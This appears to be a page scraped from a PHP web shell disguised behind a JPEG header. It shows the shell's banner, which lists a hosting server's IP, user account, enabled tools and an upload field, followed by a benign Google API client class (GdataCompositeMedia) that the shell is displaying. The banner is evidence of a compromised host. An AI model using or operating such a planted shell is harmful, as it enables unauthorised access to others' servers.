����JFIF��x�x����'
| Server IP : 78.140.185.180 / Your IP : 216.73.216.38 Web Server : LiteSpeed System : Linux cpanel13.v.fozzy.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : builderbox ( 1072) PHP Version : 7.3.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/builderbox/www/vendor/google/apiclient-services/src/YouTubeReporting/ |
Upload File : |
<?php
/*
* Copyright 2014 Google Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*/
namespace Google\Service\YouTubeReporting;
class GdataCompositeMedia extends \Google\Model
{
public $blobRef;
protected $blobstore2InfoType = GdataBlobstore2Info::class;
protected $blobstore2InfoDataType = '';
public $cosmoBinaryReference;
public $crc32cHash;
public $inline;
public $length;
public $md5Hash;
protected $objectIdType = GdataObjectId::class;
protected $objectIdDataType = '';
public $path;
public $referenceType;
public $sha1Hash;
public function setBlobRef($blobRef)
{
$this->blobRef = $blobRef;
}
public function getBlobRef()
{
return $this->blobRef;
}
/**
* @param GdataBlobstore2Info
*/
public function setBlobstore2Info(GdataBlobstore2Info $blobstore2Info)
{
$this->blobstore2Info = $blobstore2Info;
}
/**
* @return GdataBlobstore2Info
*/
public function getBlobstore2Info()
{
return $this->blobstore2Info;
}
public function setCosmoBinaryReference($cosmoBinaryReference)
{
$this->cosmoBinaryReference = $cosmoBinaryReference;
}
public function getCosmoBinaryReference()
{
return $this->cosmoBinaryReference;
}
public function setCrc32cHash($crc32cHash)
{
$this->crc32cHash = $crc32cHash;
}
public function getCrc32cHash()
{
return $this->crc32cHash;
}
public function setInline($inline)
{
$this->inline = $inline;
}
public function getInline()
{
return $this->inline;
}
public function setLength($length)
{
$this->length = $length;
}
public function getLength()
{
return $this->length;
}
public function setMd5Hash($md5Hash)
{
$this->md5Hash = $md5Hash;
}
public function getMd5Hash()
{
return $this->md5Hash;
}
/**
* @param GdataObjectId
*/
public function setObjectId(GdataObjectId $objectId)
{
$this->objectId = $objectId;
}
/**
* @return GdataObjectId
*/
public function getObjectId()
{
return $this->objectId;
}
public function setPath($path)
{
$this->path = $path;
}
public function getPath()
{
return $this->path;
}
public function setReferenceType($referenceType)
{
$this->referenceType = $referenceType;
}
public function getReferenceType()
{
return $this->referenceType;
}
public function setSha1Hash($sha1Hash)
{
$this->sha1Hash = $sha1Hash;
}
public function getSha1Hash()
{
return $this->sha1Hash;
}
}
// Adding a class alias for backwards compatibility with the previous class name.
class_alias(GdataCompositeMedia::class, 'Google_Service_YouTubeReporting_GdataCompositeMedia');